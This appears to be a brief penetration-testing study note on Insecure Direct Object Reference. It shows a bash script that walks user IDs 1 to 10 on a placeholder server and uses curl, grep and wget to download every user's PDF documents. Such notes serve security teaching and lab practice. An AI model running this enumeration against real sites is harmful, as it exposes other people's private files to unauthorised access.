Insecure Direct Object Reference (IDOR)

http://SERVER_IP:PORT/documents.php?uid=1
http://SERVER_IP:PORT/documents.php?uid=2

# Ctrl+U to see the source page
<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>

We can use bash to get the user from 1 to 10

#!/bin/bash

url="http://SERVER_IP:PORT"

for i in {1..10}; do
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
                wget -q $url/$link
        done
done

PreviousCommand Injection NextXML External Entity (XXE)

Last updated 6 months ago